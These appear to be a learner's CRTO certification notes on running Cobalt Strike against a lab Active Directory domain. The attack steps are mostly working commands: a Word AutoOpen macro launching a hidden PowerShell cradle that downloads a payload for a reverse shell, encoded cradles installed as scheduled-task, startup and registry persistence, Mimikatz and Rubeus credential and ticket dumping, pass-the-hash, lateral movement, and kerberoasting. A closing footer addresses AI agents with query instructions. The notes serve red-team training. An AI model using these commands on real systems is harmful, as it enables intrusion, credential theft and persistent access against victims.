# CRTO & Cobalt Strike

## Setting Up Cobalt Strike on Windows Machine

To start Cobalt Strike We need 2 things

1. Team Server (This will only be run on the Linux machine)
2. Cobalt Strike Client

### Setting Up TeamServer

First, we need to have a Linux box on which teamserver will run so I already have that, I will open my Linux box on the Windows machine and then run the teamserver

```
sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
```

* `10.10.5.50` is the IP address of the Attacker Linux VM.
* `Passw0rd!` is the shared password used to connect from the Cobalt Strike client.
* `webbug.profile` is an example Malleable C2 profile (covered in more detail later).

<figure><img src="/files/nbV7hQY2AFNcc5QHSxDn" alt=""><figcaption></figcaption></figure>

Now Teamserver is all good to go so we need to start cobalt strike now

### Starting Cobalt Strike Client

Now after the teamserver is started then we need to start the Cobalt Strike Client and provide the details

<figure><img src="/files/cEBujnUMMkelOm1vktST" alt=""><figcaption></figcaption></figure>

1. I added a random Alias
2. Host Should be the one where Teamserver is Running
3. You can add any Username
4. Password should be the same which you selected on the Teamserver&#x20;

<figure><img src="/files/Z3PT1g2ifo6vsFm81mj0" alt=""><figcaption><p>Cobalt Strike Started Successfully</p></figcaption></figure>

## Listeners in Cobalt Strike

We can set up some listeners in cobalt strike by press the headphones button on the top

<figure><img src="/files/uXWco6coDvNn9GsWeEaB" alt=""><figcaption></figcaption></figure>

now we can click the add button at the bottom and then add some listeners, we can set

1. http
2. dns
3. https
4. smb

below is an example of the HTTP listener

<figure><img src="/files/eLEs4FaEmWoi9mnR6aI1" alt=""><figcaption></figcaption></figure>

&#x20;in the same way we can set all the listeners

### Smb Listener

For smb listener we can see the pipes on our own system and choose any one of the found, we will not use the cobalt strike default one because that can be easily detected by the AVs.

<figure><img src="/files/hgi5c3QaimbTiGbXTDVw" alt=""><figcaption></figcaption></figure>

we can use any of the above and set the listener

## All Listeners setup done

<figure><img src="/files/wgziXN8ollz1RJ7GDT4f" alt=""><figcaption></figcaption></figure>

## Running Cobalt Strike As a Service

We can run cobalt strike as a service so once we start our linux machine we dont need to run teamserver again and again&#x20;

first we need to create a file in `/etc/systemd/system`

```
sudo nano /etc/systemd/system/teamserver.service
```

then add the following content in it

```
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target
```

<figure><img src="/files/JJ0P2IUxYwfZYLM55ghK" alt=""><figcaption></figcaption></figure>

now we need to reload the system manager&#x20;

```
sudo systemctl daemon-reload
```

now lets see the status of the teamserver service we created

```
sudo systemctl status teamserver.service
```

<figure><img src="/files/vZQd7TXdurpXwBCnAvDO" alt=""><figcaption></figcaption></figure>

now lets start the teamserver service

```
sudo systemctl start teamserver.service
```

and lets enable the teamserver service as well

```
sudo systemctl enable teamserver.service
```

now everytime the linux machine starts the teamserver service will run automatically.

<figure><img src="/files/9IvTXdFR17kOImJhxVmt" alt=""><figcaption><p>Cobakt Strike Teamserver started successfully</p></figcaption></figure>

## Generating All Payloads using Cobalt Strike

We can generate all payload in Cobalt Strike, i will choose the last option **Windows Stageless Generate All Payloads**

<figure><img src="/files/Uw1U4Qxu7cUdJ40RVTxG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/gDuqzwUT3Wc2aTleDxgL" alt=""><figcaption></figcaption></figure>

now all the payloads will be generated in the C:\Paylaods

<figure><img src="/files/ynrEJ5aS6Zy8I9Yibebb" alt=""><figcaption></figcaption></figure>

## Creating Macro With Cobalt Strike

We can open word and go to **View->Macros->Create Macro**&#x20;

Make sure you write the name **AutoOpen** and select document1 from the drop Down

<figure><img src="/files/fy65J9DwIKofxX1i1XGm" alt=""><figcaption></figcaption></figure>

Now i will write a small code to open notepad

```
Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"

End Sub
```

then we need to save it and run it and we will see notepad running

<figure><img src="/files/om8alWJytTSbLYGd7VtI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/pjbxaXiX6njAJZOMo15K" alt=""><figcaption></figcaption></figure>

### Macro For Reverse Shell in Cobalt Strike

Now i will use the Cobalt Strike Scripted Web Delivery to Host a payload and get a reverse shell

<figure><img src="/files/nGVOptJQV0NM1O2FUWME" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sMRFJhqDJi2odhqFlKYP" alt=""><figcaption></figcaption></figure>

now my payload will be hosted and we will get the following command which we can insert in the macro and once the macro&#x20;

```
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"
```

<figure><img src="/files/gtnp5cnuX3igCUe85JUn" alt=""><figcaption></figcaption></figure>

below is how the final code will look like, **make sure you use 2 double quots to escape**

```
Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"""

End Sub

```

<figure><img src="/files/RZXSvMUhN2Id9YuoF6Gp" alt=""><figcaption></figcaption></figure>

in site management i can see that my payload is hosted and listening on port 80

<figure><img src="/files/qWpdObFizIqp4DotUbLP" alt=""><figcaption></figcaption></figure>

once someone opens the macro i will get a reverse shell in my cobalt strike&#x20;

<figure><img src="/files/EiLaJ1ErX0oqBJUlOHKV" alt=""><figcaption></figcaption></figure>

## Cobalt Strike Commands&#x20;

```python
ps ----> to see the processes so we can see the AV or Endpoint Protection Processes
execute-assembly --->  (executable-file) ----> execute-assembly seatbelt.exe -group=system ---> run any exectubale file using this

Screenshots ----> take screenshots

keylogger -----> record what the target is typing

Clipboard ----> this will show us what he has copied to clipboard (not images)

net logons  ----> we will see that which users have logged into the system in the past and currently as well
```

## Persistence Techniques

Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or reboot them frequently.

If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you control if your simulated threat would also do so.

**Common userland persistence methods include:**

* **HKCU / HKLM Registry Autoruns**
* **Scheduled Tasks**
* **Startup Folder**

**Cobalt Strike doesn't include any built-in commands specifically for persistence.** [**SharPersist**](https://github.com/fireeye/SharPersist) **is a Windows persistence toolkit written by FireEye. It's written in C#, so can be executed via `execute-assembly`.**

### Persistence using Task Scheduler

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

i will now first convert the powershell download cradle into base64 so i can get rid of the double quotations and special characters problem

<pre><code>$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
<strong>
</strong><strong>[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
</strong></code></pre>

<figure><img src="/files/OsnbN6kMkjvti0GMoHcb" alt=""><figcaption></figcaption></figure>

Now i will use SharpPersist&#x20;

```
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly
```

<figure><img src="/files/pw9LlsMlmST6WM9I5TVu" alt=""><figcaption></figcaption></figure>

i can confirm on the target system as well by going to the task scheduler as well.

<figure><img src="/files/LtChzB9wdnoT02BywPTr" alt=""><figcaption></figcaption></figure>

### Persistence Using Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).

```
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add
```

<figure><img src="/files/yPrkiiX2Degs7lk5T81H" alt=""><figcaption></figcaption></figure>

We can go to the startup folder on the target machine to confirm

```
C:\Users\Programmerboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```

<figure><img src="/files/WUG3BVGcm7WA0MtsFlGH" alt=""><figcaption><p>Our Startup Reverse shell is Present</p></figcaption></figure>

### Persistence Using Registry AutoRuns

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

For this we need to uplaod our exe file to the target machine and then set it to run on every boot

<figure><img src="/files/4Mvm6ivyY5OWqaIfQmQH" alt=""><figcaption><p>I will rename this to updater.exe</p></figcaption></figure>

```
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```

<figure><img src="/files/0QtDAiUvqdEqgu3mjqt1" alt=""><figcaption></figcaption></figure>

## Mimikatz in Cobalt Strike

Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:

```
beacon> mimikatz token::elevate
beacon> mimikatz lsadump::sam
```

Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon.

```
beacon> mimikatz token::elevate ; lsadump::sam
```

The `!` elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM.  In most cases, `!` is a direct replacement for `token::elevate`. For example:

```
beacon> mimikatz !lsadump::sam

```

### NTLM Hashes&#x20;

```
beacon> mimikatz !sekurlsa::logonpasswords
```

We can alos use shorthand command for this in cobalt strike

```
logonpasswords
```

<figure><img src="/files/doGQtuS1qpoMlNKO7Yq6" alt=""><figcaption></figcaption></figure>

### Kerberos Encryption keys

```
beacon> mimikatz !sekurlsa::ekeys
```

<figure><img src="/files/T42aeiOOdvLFBwnZ3QKa" alt=""><figcaption></figcaption></figure>

### SAM File

The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only.  These can be extracted with the `lsadump::sam` Mimikatz module.  If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.

```
 beacon> mimikatz !lsadump::sam
```

<figure><img src="/files/QglzugzjT775rN3848B5" alt=""><figcaption></figcaption></figure>

### Domain Cached Creds

Unfortunately, the hash format is not NTLM so it can't be used with pass the hash.  The only viable use for these is to crack them offline.

The `lsadump::cache` Mimikatz module can extract these from `HKLM\SECURITY`.

```
mimikatz !lsadump::cache
```

To crack these with [hashcat](https://hashcat.net/hashcat/), we need to transform them into the expected format. The [example hashes page](https://hashcat.net/wiki/doku.php?id=example_hashes) shows us it should be `$DCC2$<iterations>#<username>#<hash>`.

### Extracting Kerberos Tickets

One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily.  [Rubeus](https://github.com/GhostPack/Rubeus) is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.

Its `triage` command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
```

Rubeus' `dump` command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS.  If not elevated, we can only pull tickets from our own session.  Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the `/luid` and `/service` parameters.

For example, if we only wanted the TGT for jking, we can do:

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt
```

### DCSync&#x20;

The [Directory Replication Service (MS-DRSR) protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47) is used to synchronise and replicate Active Directory data between domain controllers.  DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

Beacon has a dedicated `dcsync` command, which calls `mimikatz lsadump::dcsync` in the background.

## Domain Reconnaisance'

### Powerview

First we will Import it in the memory

```
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
```

We can run the following Commands to Enumerate the Domain

**To Get Information about the domain**

```
beacon> powershell Get-Domain
```

**Returns the domain controllers for the current or specified domain.**

```
beacon> powershell Get-DomainController | select Forest, Name, OSVersion | fl
```

**Returns all domains for the current forest or the forest specified by `-Forest`.**

```
beacon> powershell Get-ForestDomain
```

**Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.**

```
beacon> powershell Get-DomainPolicyData | select -expand SystemAccess
```

**Return all (or specific) user(s). To only return specific properties, use `-Properties`. By default, all user objects for the current domain are returned, use `-Identity` to return a specific user.**

```
beacon> powershell Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl
```

**Return all computers or specific computer objects.**

```
beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
```

**Search for all organization units (OUs) or specific OU objects.**

```
beacon> powershell Get-DomainOU -Properties Name | sort -Property Name
```

**Return all domain groups or specific domain group objects.**

```
beacon> powershell Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
```

**Return the members of a specific domain group.**

```
beacon> powershell Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
```

**Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use `-ComputerIdentity`.**

```
beacon> powershell Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
```

**Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences. You can then manually find which OUs, and by extension which computers, these GPOs apply to.**

```
beacon> powershell Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
```

**Enumerates the machines where a specific domain user/group is a member of a specific local group. This is useful for finding where domain groups have local admin access, which is a more automated way to perform the manual cross-referencing described above.**

```
beacon> powershell Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
```

**Return all domain trusts for the current or specified domain**

```
beacon> powershell Get-DomainTrust
```

## User Impersonation

### Pass The Hash Attack

If we have the NTLM hash of the user we can use cobalt strike to do pass the hash attack, after passing the hash we can easily List the C$ drive of the other computer to see wether we can list those or not.

```
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
```

### Pass the Ticket&#x20;

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
```

## Lateral Movement

Moving laterally between computers in a domain is important for accessing sensitive information/materials, and obtaining new credentials.  Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets.

The first and most convenient is to use the built-in `jump` command - the syntax is `jump [method] [target] [listener]`.  Type `jump` to see a list of methods.  This will spawn a Beacon payload on the remote target, and if using a P2P listener, will connect to it automatically.

The second strategy is to use the built-in `remote-exec` command - the syntax is `remote-exec [method] [target] [command]`.  Type `remote-exec` to see a list of methods.

Each of these strategies are compatible with the various techniques described in the **User Impersonation** chapter.  For example, you can use `pth` to impersonate a user and then `jump` to move laterally.

### Remote-exec

```
beacon> remote-exec winrm web.dev.cyberbotic.io whoami
```

### Jump

```
beacon> jump winrm64 web.dev.cyberbotic.io smb
```

```
beacon> jump psexec64 web.dev.cyberbotic.io smb
```

```
beacon> jump psexec_psh web smb
```

## Kerberoasting Using Cobalt Strike

We can use **rubeus** to find and get the TGS for the kerberoastable Users, below command will find all the kerberoastable users and give us the TGS back

```python
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
```

A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
```

Now I can target a specific user for kerberoasting as well, We can roast an individual account the `/user` paramete

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
```

## AS-REP Roasting Using Cobalt Strike

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.

As with kerberoasting, we don't want to asreproast every account in the domain.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
```

We can use the below command with rubeus to do AS-REP Roasting on user squid\_svc

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
```

## Unconstrained delegation using Cobalt strike

This query will return all computers that are permitted for unconstrained delegation.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
```

&#x20; Rubeus `triage` will show all the tickets that are currently cached.  TGTs can be identified by the krbtgt service.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
```

We can simply extract this TGT and leverage it via a new logon session.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
```

## Microsoft Defender and Bypass

### Command to Check malicious File

```
# In Powershell

Get-MpThreatDetection | Sort-Object InitialDetectionTime | Select-Object -First 5
```

<figure><img src="/files/qoZaBWDY8lqnNloDngse" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/certifications-notes/crto-and-cobalt-strike.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.